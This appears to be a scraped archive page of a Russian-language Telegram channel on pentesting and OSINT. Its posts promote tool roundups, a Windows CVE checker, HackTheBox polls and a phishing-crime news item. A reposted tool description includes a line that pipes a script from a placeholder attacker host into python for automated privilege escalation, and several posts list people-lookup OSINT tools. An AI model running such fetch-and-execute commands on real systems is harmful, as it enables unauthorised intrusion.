fa
Feedback

فریب کلاهبرداران را نخورید! تل‌متریو این کانال‌ها را شناسایی و برچسب‌گذاری می‌کند 👉 برای مشاهده برچسب، اشتراک تهیه کنید 👈

Fsecurity | HH

Fsecurity | HH

رفتن به کانال در Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

نمایش بیشتر
2 062
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+27 روز
-930 روز
آرشیو پست ها
🐱 Набор ресурсов по информационной безопасности Цель этого проекта – выступить в качестве бесплатного ресурса для всех, кто
🐱 Набор ресурсов по информационной безопасности Цель этого проекта – выступить в качестве бесплатного ресурса для всех, кто заинтересован в получении дополнительной информации об информационной безопасности. В репозитории вы найдете: 1. Анонимность 2. Основная информация о безопасности 3. Построение лаборатории для пентеста 4. Взлом автомобиля 5. OSINT 6. Фишинг 7. Социальная инженерия 8. Моделирование угроз и многое другое
«Как американцы с таким трудом усвоили в последнем столетии существования Земли, свободный поток информации является единственной гарантией от тирании. Некогда закованные в цепи люди, чьи лидеры, наконец, теряют контроль над информационным потоком, вскоре обретут свободу и жизненную силу, но свободная нация, постепенно сужающая свою власть над общественным дискурсом, начала свое стремительное сползание к деспотизму. Остерегайтесь того, кто откажет вам в доступе к информации, ибо в глубине души он мечтает стать вашим хозяином» - Комиссар Правин Лал
🗄 Репозиторий – линк. // Не хакинг, а ИБ

Repost from Kali Linux
💻 В этом посте поговорим об инструменте `GTFONow` Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins. Основные особенности: 🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo. 🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid. 🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС. 🗄Автоматическая эксплуатация через SSH‑ключи. 🗄Автоматическая эксплуатация через файл используемый в cron. 🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD. 🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python 🖥 GTFONow @linuxkalii

😈 OSINT: сборник докладов В этом посте собрали для вас подборку докладов с разных форумов, митапов и конференций. В приведён
😈 OSINT: сборник докладов В этом посте собрали для вас подборку докладов с разных форумов, митапов и конференций. В приведённом ниже списке мы рассмотрим основные методы и инструменты OSINT, которые могут помочь вам получить нужную информацию для различных целей - от исследования рынка до проверки подлинности фотографий и расследования преступлений. — Мы также обсудим, как правильно проводить поиск в интернете, как анализировать информацию и как сохранять ее для дальнейшего использования, а также узнаете, как определить надежность источника информации, а также как избегать ложной информации. 1. OSINT: Введение в специальность 2. Общедоступная и неочевидная практика OSINT, методы и кейсы 3. OSINT в расследовании киберинцидентов 4. Shadow OSINT: information leaks usage 5. Боевой OSINT: когда открытых источников не хватает. #OSINT #Recon | 🧑‍💻 Этичный хакер

Расширяем арсенал OSINT: Пять инструментов для анализа и поиска данных В эпоху цифровой информации, умение эффективно собират
Расширяем арсенал OSINT: Пять инструментов для анализа и поиска данных В эпоху цифровой информации, умение эффективно собирать и анализировать данные из открытых источников становится критически важным навыком. Подборка пяти малоизвестных инструментов OSINT: MetaDetective — этот простой в использовании инструмент анализирует метаданные файлов и извлекает из них важную информацию, включая имена создателей документов, пользователей, внесших изменения, и многие другие данные, которые могут быть скрыты в файле. E4GL30S1NT — OSINT инструмент для сбора информации, включая данные из Facebook, поиск электронной почты, Google поиск, сведения о телефонных номерах, DNS и WHOIS запросы, а также трассировку IP. Moriarty-Project — это инструмент, который предоставляет всестороннюю информацию о введенном номере телефона. Он не только пытается найти владельца номера, но и проверяет его на спам, комментарии, а также связанные социальные сети и поисковые отчеты. dorks_hunter — он создан для выявления уязвимостей в веб-приложениях и для сбора информации о цели через google-доркинг,скрипт на питоне очень простой. truffleHog — это инструмент, который просматривает git репозитории на предмет случайно загруженных ключей доступа, паролей и другой чувствительной информации. LH | Новости | Курсы | Мемы #подборка

sticker.webp0.20 KB

У нас есть команда на HackTheBox ⚔️ Вы можете вступить, если хотите. Будете ?
Anonymous voting

Repost from Pentest HaT
🖼️ Moriarty v1.1 Чекер CVEs и уязвимостей написанный на C# для ОС 🏠 Windows Поддерживаемые версии: Windows 10 (Versions: 15
🖼️ Moriarty v1.1 Чекер CVEs и уязвимостей написанный на C# для ОС 🏠 Windows Поддерживаемые версии:
Windows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)
Windows 11 (Versions: 21H2, 22H1, 22H2, 23H1)
Windows Server 2016, 2019, 2022
Список уязвимостей (35):
MS10-015
MS10-092
MS13-053
MS13-081
MS14-058
MS15-051
MS15-078
MS16-016
MS16-032
MS16-034
MS16-135
CVE-2017-7199
CVE-2019-0836
CVE-2019-0836
CVE-2019-1064
CVE-2019-1130
CVE-2019-1253
CVE-2019-1315
CVE-2019-1385
CVE-2019-1388
CVE-2019-1405
CVE-2020-0668
CVE-2020-0683
CVE-2020-0796
CVE-2020-1013
CVE-2020-1013
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
CVE-2021-44228
CVE-2021-36934
CVE-2022-40140
CVE-2022-22965
CVE-2023-36664
👉 Описание уязвимостей Также бот поддерживает поиск эксплоитов по CVE !poc CVE-2019-1064 💻 Home Для сборки понадобится Visual Studio и .NET Framework 4.8 Developer Pack #moriarty #checker #csharp ✈️ // Pentest HaT 🎩

У вас есть аккаунт на HackTheBox?
Anonymous voting

🏴‍☠️ Осудили школьника, писавшего код для банды из 700 киберпреступников Группа киберпреступников использовала фишинговые са
🏴‍☠️ Осудили школьника, писавшего код для банды из 700 киберпреступников
Группа киберпреступников использовала фишинговые сайты для хищения денег с банковских карт.
Мошенники действовали через онлайн-барахолки, представляясь покупателями и предлагая жертвам оплатить товар через поддельные страницы популярных маркет-плейсов. Введя данные своей карты для получения оплаты, пользователи, в итоге, теряли деньги на своих счетах. Примечательно, что ключевую роль в этой схеме играл несовершеннолетний кодер, ученик одной из минских школ. В течение полутора лет он занимался разработкой программного обеспечения, необходимого для поддержания и оптимизации деятельности всей киберкомпании.
Его действия были квалифицированы как хищение имущества путем модификации компьютерной информации.
Молодой кодер, будучи частью организованной группы, смог украсть через фишинг более 24 тысяч рублей с карт потерпевших.
Исходя из доказательств, суд вынес приговор, согласно которому юноше назначено наказание в виде
5 лет лишения свободы в условиях общего режима исправительной колонии
.
// Не хакинг, а ИБ

Вышла новая версия сканнера Nuclei (3.2.0). Теперь он умеет в фаззинг без танцев с бубном! https://github.com/projectdiscovery/nuclei/releases/tag/v3.2.0